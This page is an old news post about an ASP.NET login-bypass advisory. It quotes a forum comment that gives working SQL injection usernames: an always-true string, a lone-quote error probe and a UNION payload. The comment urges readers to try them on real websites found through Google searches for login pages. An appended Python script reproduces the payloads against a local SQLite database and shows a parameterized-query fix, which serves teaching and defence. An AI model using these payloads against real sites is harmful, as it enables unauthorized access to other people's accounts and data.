Microsoft-based web sites have major vulnerability

Posted by Pile (8265 views)


An advisory has been released for a vulnerability in Microsoft's ASP.NET that reportedly lets an attacker bypass password protection on web sites built with it. If you do business with a company that runs its e-commerce system on this insecure Microsoft technology, your personal information may be at risk.



comment from slashdot
Posted by Anonymous on 2004-10-07 13:57:48
This is interesting:

What's next: "The cat catches mice" "The pope is catholic" "There were no weapons of mass destruction in Iraq" "Water wets"?

I have news for you: 1 password-protected ASP application out of 3 can be accessed using the username ' or ''='' or ''=' and the empty password (the first and last single quote are part of the username).

Reason: SQL injection.

Supposedly these apps verify the password via a construct equivalent to the following (pseudo-syntax, I don't know enough VB to write real code):

answer = query_execute("SELECT account_id FROM users WHERE username='" + username + "' AND password='" + password + "'");

Yes, they use string concatenation to build the query, rather than using wildcards (bind variables)! Not sure ASP even supports wildcards...

What happens with the magic username above, is that a query such as the following is executed against the database:

SELECT account_id FROM users WHERE username='' or ''='' or ''='' AND password=''

(the part of the query coming from the user-entered data is the ' or ''='' or ''=' in the middle; the rest is what came from the program). This is a query that matches all rows, so you'll usually get connected using the credentials from the first account in the table (often administrator, he!). Try it out! Go to Google, search for login asp username password [google.com] and pick one of the sites from "the middle of the stack" (i.e. not from the first few pages returned, because those are mostly either ASP tutorials or the rare "secure" ASP sites). Saying username and password in another language (Benutzername/Passwort) helps too, as you'll get a "fresher", less overfished list ;-)

If the simplistic approach doesn't work, try entering a lone single quote as the username and/or password. You'll often get an error message that shows you part of the query used, and from there you can find how to word your username so that you still get access. For instance, some sites do not use the password in the WHERE clause, but instead return it. In that case, use something such as the following as your username, and zozo as the password:

' union select 0,'zozo' from users where ''='

The query obviously needs some tweaking, as the number of columns, the position of the password in the select clause, and the names of the tables vary among sites. But fortunately, error messages are often verbose enough that with a little bit of trial and error you can figure out a "magic" username that opens the door to the kingdom.

If you are a site administrator whose app is vulnerable: rewriting your app is indeed a solution... preferably in PHP!
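The three tricks in the comment above (the all-rows username, the lone single quote as an error probe, and the UNION username against a login that selects the password instead of filtering on it) as an added, runnable example. This is not code from the BSAlert page or from the quoted Slashdot comment; it reproduces the pattern against an in-memory SQLite database, and the users table, its two rows and the function names are constructed here for illustration. The fix shown last is a parameterized query, which is what the comment calls "bind variables" (classic ASP's ADO does support them through Command parameters, so the concatenation is a choice, not a limitation).

```python
"""
Added example, not code from the BSAlert page or the quoted Slashdot comment:
the login bypass the comment describes, reproduced against an in-memory
SQLite database so it runs offline. Table, rows and function names are
constructed for illustration.
"""
import sqlite3

# Constructed sample data. The administrator sits in the first row, which is
# why an all-rows match "often" logs you in as the admin.
SCHEMA = """
CREATE TABLE users (account_id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO users VALUES (1, 'administrator', 'hunter2');
INSERT INTO users VALUES (2, 'alice', 's3cret');
"""

# The two "magic" usernames quoted in the comment.
MAGIC_USERNAME = "' or ''='' or ''='"
UNION_USERNAME = "' union select 0,'zozo' from users where ''='"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def login_concat(conn, username, password):
    """The comment's pseudocode: the query is built by string concatenation.
    Returns the account_id the app would log the caller in as, None when
    nothing matches, or the database error text when the query fails to parse
    (the comment's lone-quote probe, and what a verbose error page leaks)."""
    sql = ("SELECT account_id FROM users WHERE username='" + username
           + "' AND password='" + password + "'")
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.OperationalError as e:
        return "error: " + str(e)
    return row[0] if row else None


def login_concat_returning_password(conn, username, password):
    """The second pattern in the comment: the password is not in the WHERE
    clause; the app selects it and compares in code. Same concatenation bug,
    so a UNION row with an attacker-chosen password passes the comparison."""
    sql = "SELECT account_id, password FROM users WHERE username='" + username + "'"
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.OperationalError as e:
        return "error: " + str(e)
    if row and row[1] == password:
        return row[0]
    return None


def login_parameterized(conn, username, password):
    """The fix: bind variables. The username reaches the engine as data,
    so the quotes and keywords in it are never parsed as SQL."""
    sql = "SELECT account_id FROM users WHERE username=? AND password=?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print(login_concat(db, MAGIC_USERNAME, ""))                         # 1
    print(login_concat(db, "'", ""))                                    # error: ...
    print(login_concat_returning_password(db, UNION_USERNAME, "zozo"))  # 0
    print(login_parameterized(db, MAGIC_USERNAME, ""))                  # None
```

The all-rows username turns the WHERE clause into `username='' or ''='' or ''='' AND password=''`; since AND binds tighter than OR, the `''=''` term alone makes every row match and the first one is returned. The UNION username only works when the injected SELECT has the same number of columns as the original, which is the "tweaking" the comment refers to.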
